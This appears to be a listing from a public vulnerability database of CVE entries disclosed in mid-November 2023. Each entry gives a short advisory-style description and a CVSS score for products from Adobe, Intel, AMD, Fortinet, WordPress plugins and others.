2023-11-14 CVE-2023-43901 Emsigner Unspecified vulnerability in Emsigner 2.8.7

Incorrect access control in the AdHoc User creation form of EMSigner v2.8.7 allows unauthenticated attackers to arbitrarily modify usernames and privileges by using the email address of a registered user.

5.9
2023-11-14 CVE-2023-46445 Asyncssh Project Insufficient Verification of Data Authenticity vulnerability in Asyncssh Project Asyncssh

An issue in AsyncSSH before 2.14.1 allows attackers to control the extension info message (RFC 8308) via a man-in-the-middle attack, aka a "Rogue Extension Negotiation."

5.9
2023-11-14 CVE-2023-20521 AMD Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in AMD products

TOCTOU in the ASP Bootloader may allow an attacker with physical access to tamper with SPI ROM records after memory content verification, potentially leading to loss of confidentiality or a denial of service.

5.7
2023-11-19 CVE-2023-5341 Imagemagick
Fedoraproject
Use After Free vulnerability in multiple products

A heap use-after-free flaw was found in coders/bmp.c in ImageMagick.

5.5
2023-11-17 CVE-2023-47071 Adobe Out-of-bounds Read vulnerability in Adobe After Effects 24.0

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-17 CVE-2023-44325 Adobe Out-of-bounds Read vulnerability in Adobe Animate

Adobe Animate versions 23.0.2 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-17 CVE-2023-44326 Adobe Out-of-bounds Read vulnerability in Adobe Dimension

Adobe Dimension versions 3.4.9 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-47025 Free5Gc Resource Exhaustion vulnerability in Free5Gc 3.3.0

An issue in Free5gc v.3.3.0 allows a local attacker to cause a denial of service via the free5gc-compose component.

5.5
2023-11-16 CVE-2023-47046 Adobe Out-of-bounds Write vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user.

5.5
2023-11-16 CVE-2023-47048 Adobe Out-of-bounds Read vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

5.5
2023-11-16 CVE-2023-47049 Adobe Out-of-bounds Read vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

5.5
2023-11-16 CVE-2023-47050 Adobe Out-of-bounds Read vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

5.5
2023-11-16 CVE-2023-47051 Adobe Out-of-bounds Write vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user.

5.5
2023-11-16 CVE-2023-47052 Adobe Out-of-bounds Read vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-47053 Adobe Access of Uninitialized Pointer vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-47054 Adobe Access of Uninitialized Pointer vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44327 Adobe Access of Uninitialized Pointer vulnerability in Adobe Bridge

Adobe Bridge versions 13.0.4 (and earlier) and 14.0.0 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44328 Adobe Use After Free vulnerability in Adobe Bridge

Adobe Bridge versions 13.0.4 (and earlier) and 14.0.0 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44329 Adobe Access of Uninitialized Pointer vulnerability in Adobe Bridge

Adobe Bridge versions 13.0.4 (and earlier) and 14.0.0 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44331 Adobe Out-of-bounds Read vulnerability in Adobe Photoshop

Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44332 Adobe Out-of-bounds Read vulnerability in Adobe Photoshop

Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44333 Adobe Out-of-bounds Read vulnerability in Adobe Photoshop

Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44334 Adobe Out-of-bounds Read vulnerability in Adobe Photoshop

Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44335 Adobe Out-of-bounds Read vulnerability in Adobe Photoshop

Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-47044 Adobe Access of Uninitialized Pointer vulnerability in Adobe Media Encoder

Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44339 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44340 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44348 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44356 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44357 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44358 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44360 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44361 Adobe Use After Free vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44296 Dell Use of Hard-coded Credentials vulnerability in Dell E-Lab Navigator 3.1.8/3.1.9

Dell ELab-Navigator, version 3.1.9 contains a hard-coded credential vulnerability.

5.5
2023-11-15 CVE-2023-6105 Zohocorp Unspecified vulnerability in Zohocorp products

An information disclosure vulnerability exists in multiple ManageEngine products that can result in encryption keys being exposed.

5.5
2023-11-15 CVE-2023-46672 Elastic Information Exposure Through Log Files vulnerability in Elastic Logstash 7.12.1/8.10.0

An issue was identified by Elastic whereby sensitive information is recorded in Logstash logs under specific circumstances. The prerequisites for the manifestation of this issue are: * Logstash is configured to log in JSON format https://www.elastic.co/guide/en/logstash/current/running-logstash-command-line.html , which is not the default logging format. * Sensitive data is stored in the Logstash keystore and referenced as a variable in Logstash configuration.

5.5
2023-11-15 CVE-2023-38544 Ivanti Unspecified vulnerability in Ivanti Secure Access Client 22.2/22.3

A logged in user can modify specific files that may lead to unauthorized changes in system-wide configuration settings.

5.5
2023-11-14 CVE-2023-39202 Zoom Untrusted Search Path vulnerability in Zoom Rooms and Virtual Desktop Infrastructure

Untrusted search path in Zoom Rooms Client for Windows and Zoom VDI Client may allow a privileged user to conduct a denial of service via local access.

5.5
2023-11-14 CVE-2023-36558 Microsoft Unspecified vulnerability in Microsoft .Net and Visual Studio 2022

ASP.NET Core - Security Feature Bypass Vulnerability

5.5
2023-11-14 CVE-2023-46581 Code Projects SQL Injection vulnerability in Code-Projects Inventory Management 1.0

SQL injection vulnerability in Inventory Management v.1.0 allows a local attacker to execute arbitrary code via the name, uname and email parameters in the registration.php component.

5.5
2023-11-14 CVE-2023-47384 Gpac Memory Leak vulnerability in Gpac 2.3Devrev617G671976Fccmaster

MP4Box GPAC v2.3-DEV-rev617-g671976fcc-master was discovered to contain a memory leak in the function gf_isom_add_chapter at /isomedia/isom_write.c.

5.5
2023-11-14 CVE-2021-46748 Intel
AMD
Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in multiple products

Insufficient bounds checking in the ASP (AMD Secure Processor) may allow an attacker to access memory outside the bounds of what is permissible to a TA (Trusted Application) resulting in a potential denial of service.

5.5
2023-11-14 CVE-2021-46766 AMD Incomplete Cleanup vulnerability in AMD products

Improper clearing of sensitive data in the ASP Bootloader may expose secret keys to a privileged attacker accessing ASP SRAM, potentially leading to a loss of confidentiality.

5.5
2023-11-14 CVE-2022-42879 Intel NULL Pointer Dereference vulnerability in Intel Graphics Driver

NULL pointer dereference in some Intel(R) Arc(TM) Control software before version 1.73.5335.2 may allow an authenticated user to potentially enable denial of service via local access.

5.5
2023-11-14 CVE-2022-43477 Intel Incomplete Cleanup vulnerability in Intel Unison Software

Incomplete cleanup for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2022-43666 Intel Unspecified vulnerability in Intel Unison Software

Exposure of sensitive system information due to uncleared debug information for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2022-45109 Intel Improper Initialization vulnerability in Intel Unison Software

Improper initialization for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2022-46299 Intel Unspecified vulnerability in Intel Unison Software

Insufficient control flow management for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2022-46646 Intel Unspecified vulnerability in Intel Unison Software

Exposure of sensitive information to an unauthorized actor for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2022-46647 Intel Information Exposure Through Log Files vulnerability in Intel Unison Software

Insertion of sensitive information into log file for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2023-22305 Intel Integer Overflow or Wraparound vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Integer overflow in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable denial of service via local access.

5.5
2023-11-14 CVE-2023-25071 Intel NULL Pointer Dereference vulnerability in Intel ARC a Graphics and Iris XE Graphics

NULL pointer dereference in some Intel(R) Arc(TM) & Iris(R) Xe Graphics - WHQL - Windows Drviers before version 31.0.101.4255 may allow authenticated user to potentially enable denial of service via local access.

5.5
2023-11-14 CVE-2023-25080 Intel Unspecified vulnerability in Intel Openvino 2018

Protection mechanism failure in some Intel(R) Distribution of OpenVINO toolkit software before version 2023.0.0 may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2023-25949 Intel Resource Exhaustion vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Uncontrolled resource consumption in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable denial of service via local access.

5.5
2023-11-14 CVE-2023-25952 Intel Out-of-bounds Write vulnerability in Intel ARC a Graphics and Iris XE Graphics

Out-of-bounds write in some Intel(R) Arc(TM) Control software before version 1.73.5335.2 may allow an authenticated user to potentially enable denial of service via local access.

5.5
2023-11-14 CVE-2023-26589 Intel Use After Free vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Use after free in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allowed an authenticated user to potentially enable denial of service via local access.

5.5
2023-11-14 CVE-2023-27306 Intel Improper Initialization vulnerability in Intel products

Improper Initialization in firmware for some Intel(R) Optane(TM) SSD products may allow an authenticated user to potentially enable denial of service via local access.

5.5
2023-11-14 CVE-2023-28404 Intel Out-of-bounds Read vulnerability in Intel ARC a Graphics and Iris XE Graphics

Out-of-bounds read in the Intel(R) Arc(TM) & Iris(R) Xe Graphics - WHQL - Windows drivers before version 31.0.101.4255 may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2023-28723 Intel Unspecified vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Exposure of sensitive information to an unauthorized actor in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2023-32283 Intel Information Exposure Through Log Files vulnerability in Intel on Demand 1.16.1.1/2.1.0.1/3.0.1.3

Insertion of sensitive information into log file in some Intel(R) On Demand software before versions 1.16.2, 2.1.1, 3.1.0 may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2023-33872 Intel Unspecified vulnerability in Intel Support

Improper access control in the Intel Support android application all verions may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2023-40719 Fortinet Use of Hard-coded Credentials vulnerability in Fortinet Fortianalyzer and Fortimanager

A use of hard-coded credentials vulnerability in Fortinet FortiAnalyzer and FortiManager 7.0.0 - 7.0.8, 7.2.0 - 7.2.3 and 7.4.0 allows an attacker to access Fortinet private testing data via the use of static credentials.

5.5
2023-11-14 CVE-2023-33304 Fortinet Use of Hard-coded Credentials vulnerability in Fortinet Forticlient

A use of hard-coded credentials vulnerability in Fortinet FortiClient Windows 7.0.0 - 7.0.9 and 7.2.0 - 7.2.1 allows an attacker to bypass system protections via the use of static credentials.

5.5
2023-11-14 CVE-2023-36042 Microsoft Resource Exhaustion vulnerability in Microsoft Visual Studio 2019 and Visual Studio 2022

Visual Studio Denial of Service Vulnerability

5.5
2023-11-14 CVE-2023-36404 Microsoft Unspecified vulnerability in Microsoft products

Windows Kernel Information Disclosure Vulnerability

5.5
2023-11-14 CVE-2023-36406 Microsoft Unspecified vulnerability in Microsoft products

Windows Hyper-V Information Disclosure Vulnerability

5.5
2023-11-14 CVE-2023-36428 Microsoft Unspecified vulnerability in Microsoft products

Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability

5.5
2023-11-14 CVE-2023-44248 Fortinet Improper Access Control vulnerability in Fortinet Fortiedr 4.0.0/5.0.3

An improper access control vulnerability [CWE-284] in FortiEDRCollectorWindows version 5.2.0.4549 and below, 5.0.3.1007 and below, 4.0 all may allow a local attacker to prevent the collector service to start in the next system reboot by tampering with some registry keys of the service.

5.5
2023-11-13 CVE-2023-46021 Code Projects SQL Injection vulnerability in Code-Projects Blood Bank 1.0

SQL Injection vulnerability in cancel.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary commands via the 'reqid' parameter.

5.5
2023-11-13 CVE-2023-46014 Code Projects SQL Injection vulnerability in Code-Projects Blood Bank 1.0

SQL Injection vulnerability in hospitalLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'hemail' and 'hpassword' parameters.

5.5
2023-11-13 CVE-2023-46017 Code Projects SQL Injection vulnerability in Code-Projects Blood Bank 1.0

SQL Injection vulnerability in receiverLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'remail' and 'rpassword' parameters.

5.5
2023-11-13 CVE-2023-46018 Code Projects SQL Injection vulnerability in Code-Projects Blood Bank 1.0

SQL injection vulnerability in receiverReg.php in Code-Projects Blood Bank 1.0 \allows attackers to run arbitrary SQL commands via 'remail' parameter.

5.5
2023-11-18 CVE-2023-44796 Limesurvey Cross-site Scripting vulnerability in Limesurvey

Cross Site Scripting (XSS) vulnerability in LimeSurvey before version 6.2.9-230925 allows a remote attacker to escalate privileges via a crafted script to the _generaloptions_panel.php component.

5.4
2023-11-17 CVE-2023-48295 Librenms Cross-site Scripting vulnerability in Librenms

LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems.

5.4
2023-11-17 CVE-2023-5445 Mcafee Open Redirect vulnerability in Mcafee Epolicy Orchestrator

An open redirect vulnerability in ePolicy Orchestrator prior to 5.10.0 CP1 Update 2, allows a remote low privileged user to modify the URL parameter for the purpose of redirecting URL request(s) to a malicious site.

5.4
2023-11-17 CVE-2023-48649 Concretecms Cross-site Scripting vulnerability in Concretecms Concrete CMS

Concrete CMS before 8.5.13 and 9.x before 9.2.2 allows stored XSS on the Admin page via an uploaded file name.

5.4
2023-11-16 CVE-2023-48222 Pagerduty Missing Authorization vulnerability in Pagerduty Rundeck

Rundeck is an open source automation service with a web console, command line tools and a WebAPI.

5.4
2023-11-16 CVE-2023-47239 Wpplugin Cross-site Scripting vulnerability in Wpplugin Easy Paypal Shopping Cart

Auth.

5.4
2023-11-16 CVE-2023-47240 Codebxr Cross-site Scripting vulnerability in Codebxr CBX MAP for Google MAP & Openstreetmap

Auth.

5.4
2023-11-16 CVE-2023-47242 Marcomilesi Cross-site Scripting vulnerability in Marcomilesi Anac XML Bandi DI Gara

Auth.

5.4
2023-11-16 CVE-2023-6013 H2O Unspecified vulnerability in H2O

H2O is vulnerable to stored XSS vulnerability which can lead to a Local File Include attack.

5.4
2023-11-15 CVE-2023-48197 Grocy Project Cross-site Scripting vulnerability in Grocy Project Grocy 4.0.3

Cross-Site Scripting (XSS) vulnerability in the ‘manageApiKeys’ component of Grocy 4.0.3 and earlier allows attackers to obtain victim's cookies when the victim clicks on the "see QR code" function.

5.4
2023-11-15 CVE-2023-48198 Grocy Project Cross-site Scripting vulnerability in Grocy Project Grocy 4.0.3

A Cross-Site Scripting (XSS) vulnerability in the 'product description' component within '/api/stock/products' of Grocy version <= 4.0.3 allows attackers to obtain a victim's cookies.

5.4
2023-11-15 CVE-2023-48200 Grocy Project Cross-site Scripting vulnerability in Grocy Project Grocy 4.0.3

Cross Site Scripting vulnerability in Grocy v.4.0.3 allows a local attacker to execute arbitrary code and obtain sensitive information via the equipment description component within /equipment/ component.

5.4
2023-11-15 CVE-2023-48087 Xuxueli Incorrect Permission Assignment for Critical Resource vulnerability in Xuxueli Xxl-Job 2.4.0

xxl-job-admin 2.4.0 is vulnerable to Insecure Permissions via /xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailCat.

5.4
2023-11-15 CVE-2023-48088 Xuxueli Cross-site Scripting vulnerability in Xuxueli Xxl-Job 2.4.0

xxl-job-admin 2.4.0 is vulnerable to Cross Site Scripting (XSS) via /xxl-job-admin/joblog/logDetailPage.

5.4
2023-11-15 CVE-2023-4889 Shareaholic Cross-site Scripting vulnerability in Shareaholic

The Shareaholic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'shareaholic' shortcode in versions up to, and including, 9.7.8 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-15 CVE-2023-47446 Phpgurukul Cross-site Scripting vulnerability in PHPgurukul Pre-School Enrollment System 1.0

Pre-School Enrollment version 1.0 is vulnerable to Cross Site Scripting (XSS) on the profile.php page via fullname parameter.

5.4
2023-11-15 CVE-2023-47309 Nukium Cross-site Scripting vulnerability in Nukium GLS 3.0.1

Nukium nkmgls before version 3.0.2 is vulnerable to Cross Site Scripting (XSS) via NkmGlsCheckoutModuleFrontController::displayAjaxSavePhoneMobile.

5.4
2023-11-14 CVE-2023-46580 Code Projects Cross-site Scripting vulnerability in Code-Projects Inventory Management 1.0

Cross-Site Scripting (XSS) vulnerability in Inventory Management V1.0 allows attackers to execute arbitrary code via the pname parameter of the editProduct.php component.

5.4
2023-11-14 CVE-2023-47545 Fatcatapps Cross-site Scripting vulnerability in Fatcatapps Forms for Mailchimp BY Optin CAT

Auth.

5.4
2023-11-14 CVE-2023-26222 Tibco Cross-site Scripting vulnerability in Tibco EBX

The Web Application component of TIBCO Software Inc.'s TIBCO EBX and TIBCO Product and Service Catalog powered by TIBCO EBX contains an easily exploitable vulnerability that allows a low privileged attacker with network access to execute a stored XSS on the affected system.

5.4
2023-11-14 CVE-2023-47127 Typo3 Improper Authentication vulnerability in Typo3

TYPO3 is an open source PHP based web content management system released under the GNU GPL.

5.4
2023-11-14 CVE-2023-47654 Livescore Cross-site Scripting vulnerability in Livescore Bzscore

Auth.

5.4
2023-11-14 CVE-2023-47656 Marcomilesi Cross-site Scripting vulnerability in Marcomilesi Anac XML Bandi DI Gara

Auth.

5.4
2023-11-14 CVE-2023-36031 Microsoft Cross-site Scripting vulnerability in Microsoft Dynamics 365

Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

5.4
2023-11-14 CVE-2023-36410 Microsoft Cross-site Scripting vulnerability in Microsoft Dynamics 365

Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

5.4
2023-11-14 CVE-2023-36633 Fortinet Incorrect Permission Assignment for Critical Resource vulnerability in Fortinet Fortimail

An improper authorization vulnerability [CWE-285] in FortiMail webmail version 7.2.0 through 7.2.2 and before 7.0.5 allows an authenticated attacker to see and modify the title of address book folders of other users via crafted HTTP or HTTPs requests.

5.4
2023-11-14 CVE-2023-47659 Lava Code Cross-site Scripting vulnerability in Lava-Code Lava Directory Manager

Auth.

5.4
2023-11-14 CVE-2023-6127 Salesagility Unrestricted Upload of File with Dangerous Type vulnerability in Salesagility Suitecrm

Unrestricted Upload of File with Dangerous Type in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.

5.4
2023-11-14 CVE-2023-6128 Salesagility Cross-site Scripting vulnerability in Salesagility Suitecrm

Cross-site Scripting (XSS) - Reflected in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.

5.4
2023-11-14 CVE-2023-45879 Gibbonedu Cross-site Scripting vulnerability in Gibbonedu Gibbon

GibbonEdu Gibbon version 25.0.0 allows HTML Injection via an IFRAME element to the Messager component.

5.4
2023-11-14 CVE-2023-42325 Netgate Cross-site Scripting vulnerability in Netgate Pfsense 2.7.0

Cross Site Scripting (XSS) vulnerability in Netgate pfSense v.2.7.0 allows a remote attacker to gain privileges via a crafted url to the status_logs_filter_dynamic.php page.

5.4
2023-11-14 CVE-2023-42327 Netgate Cross-site Scripting vulnerability in Netgate Pfsense 2.7.0

Cross Site Scripting (XSS) vulnerability in Netgate pfSense v.2.7.0 allows a remote attacker to gain privileges via a crafted URL to the getserviceproviders.php page.

5.4
2023-11-14 CVE-2023-47680 Qodeinteractive Cross-site Scripting vulnerability in Qodeinteractive QI Addons for Elementor

Auth.

5.4
2023-11-13 CVE-2023-6103 Intelbras Cross-site Scripting vulnerability in Intelbras RX 1500 Firmware 1.1.9

A vulnerability has been found in Intelbras RX 1500 1.1.9 and classified as problematic.

5.4
2023-11-13 CVE-2023-48068 Dedecms Cross-site Scripting vulnerability in Dedecms 6.2

DedeCMS v6.2 was discovered to contain a Cross-site Scripting (XSS) vulnerability via spec_add.php.

5.4
2023-11-13 CVE-2023-4775 Tinywebgallery Cross-site Scripting vulnerability in Tinywebgallery Advanced Iframe

The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'advanced_iframe' shortcode in versions up to, and including, 2023.8 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-13 CVE-2023-5741 Powr Cross-site Scripting vulnerability in Powr

The POWR plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'powr-powr-pack' shortcode in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-17 CVE-2023-26364 Adobe Unspecified vulnerability in Adobe Css-Tools

@adobe/css-tools version 4.3.0 and earlier are affected by an Improper Input Validation vulnerability that could result in a minor denial of service while attempting to parse CSS.

5.3
2023-11-17 CVE-2023-38324 Opennds Unspecified vulnerability in Opennds Captive Portal

An issue was discovered in OpenNDS before 10.1.2.

5.3
2023-11-15 CVE-2023-4723 Webtechstreet Unspecified vulnerability in Webtechstreet Elementor Addon Elements

The Elementor Addon Elements plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.12.7 via the ajax_eae_post_data function.

5.3
2023-11-15 CVE-2023-47636 Pimcore Information Exposure Through an Error Message vulnerability in Pimcore Admin Classic Bundle

The Pimcore Admin Classic Bundle provides a Backend UI for Pimcore.

5.3
2023-11-15 CVE-2023-6032 Schneider Electric Path Traversal vulnerability in Schneider-Electric Galaxy VL Firmware and Galaxy VS Firmware

A CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability exists that could cause a file system enumeration and file download when an attacker navigates to the Network Management Card via HTTPS.

5.3
2023-11-14 CVE-2023-41570 Mikrotik Unspecified vulnerability in Mikrotik Routeros

MikroTik RouterOS v7.1 to 7.11 was discovered to contain incorrect access control mechanisms in place for the Rest API.

5.3
2023-11-14 CVE-2023-47126 Typo3 Unspecified vulnerability in Typo3

TYPO3 is an open source PHP based web content management system released under the GNU GPL.

5.3
2023-11-14 CVE-2022-23830 AMD Unspecified vulnerability in AMD products

SMM configuration may not be immutable, as intended, when SNP is enabled resulting in a potential limited loss of guest memory integrity.

5.3
2023-11-14 CVE-2023-41366 SAP Exposure of System Data to an Unauthorized Control Sphere vulnerability in SAP Netweaver Application Server Abap

Under certain condition SAP NetWeaver Application Server ABAP - versions KERNEL 722, KERNEL 7.53, KERNEL 7.77, KERNEL 7.85, KERNEL 7.89, KERNEL 7.54, KERNEL 7.91, KERNEL 7.92, KERNEL 7.93, KERNEL 7.94, KERNEL64UC 7.22, KERNEL64UC 7.22EXT, KERNEL64UC 7.53, KERNEL64NUC 7.22, KERNEL64NUC 7.22EXT, allows an unauthenticated attacker to access the unintended data due to the lack of restrictions applied which may lead to low impact in confidentiality and no impact on the integrity and availability of the application.

5.3
2023-11-14 CVE-2023-42480 SAP Improper Restriction of Excessive Authentication Attempts vulnerability in SAP Netweaver Application Server Java 7.50

The unauthenticated attacker in NetWeaver AS Java Logon application - version 7.50, can brute force the login functionality to identify the legitimate user ids. This will have an impact on confidentiality but there is no other impact on integrity or availability.

5.3
2023-11-13 CVE-2023-42813 Nirmata Unspecified vulnerability in Nirmata Kyverno 1.11.0

Kyverno is a policy engine designed for Kubernetes.

5.3
2023-11-13 CVE-2023-42814 Nirmata Unspecified vulnerability in Nirmata Kyverno 1.11.0

Kyverno is a policy engine designed for Kubernetes.

5.3
2023-11-13 CVE-2023-42815 Nirmata Unspecified vulnerability in Nirmata Kyverno 1.11.0

Kyverno is a policy engine designed for Kubernetes.

5.3
2023-11-13 CVE-2023-42816 Nirmata Unspecified vulnerability in Nirmata Kyverno 1.11.0

Kyverno is a policy engine designed for Kubernetes.

5.3
2023-11-13 CVE-2023-6100 Maiwei Safety Production Control Platform Project Unspecified vulnerability in Maiwei Safety Production Control Platform Project Maiwei Safety Production Control Platform 4.1

A vulnerability classified as problematic was found in Maiwei Safety Production Control Platform 4.1.

5.3
2023-11-14 CVE-2023-47262 Abbott Unspecified vulnerability in Abbott ID NOW Firmware

The startup process and device configurations of the Abbott ID NOW device, before v7.1, can be interrupted and/or modified via physical access to an internal serial port.

5.2
2023-11-17 CVE-2023-47283 Cubecart Path Traversal vulnerability in Cubecart

Directory traversal vulnerability in CubeCart prior to 6.5.3 allows a remote authenticated attacker with an administrative privilege to obtain files in the system.

4.9
2023-11-15 CVE-2023-6133 Incsub Unrestricted Upload of File with Dangerous Type vulnerability in Incsub Forminator

The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient blacklisting on the 'forminator_allowed_mime_types' function in versions up to, and including, 1.27.0.

4.9
2023-11-15 CVE-2023-5984 Schneider Electric Download of Code Without Integrity Check vulnerability in Schneider-Electric Ion8650 Firmware and Ion8800 Firmware

A CWE-494 Download of Code Without Integrity Check vulnerability exists that could allow modified firmware to be uploaded when an authorized admin user begins a firmware update procedure which could result in full control over the device.

4.9
2023-11-14 CVE-2023-46025 Phpgurukul SQL Injection vulnerability in PHPgurukul Teacher Subject Allocation Management System 1.0

SQL Injection vulnerability in teacher-info.php in phpgurukul Teacher Subject Allocation Management System 1.0 allows attackers to obtain sensitive information via the 'editid' parameter.

4.9
2023-11-14 CVE-2021-26345 AMD Out-of-bounds Read vulnerability in AMD products

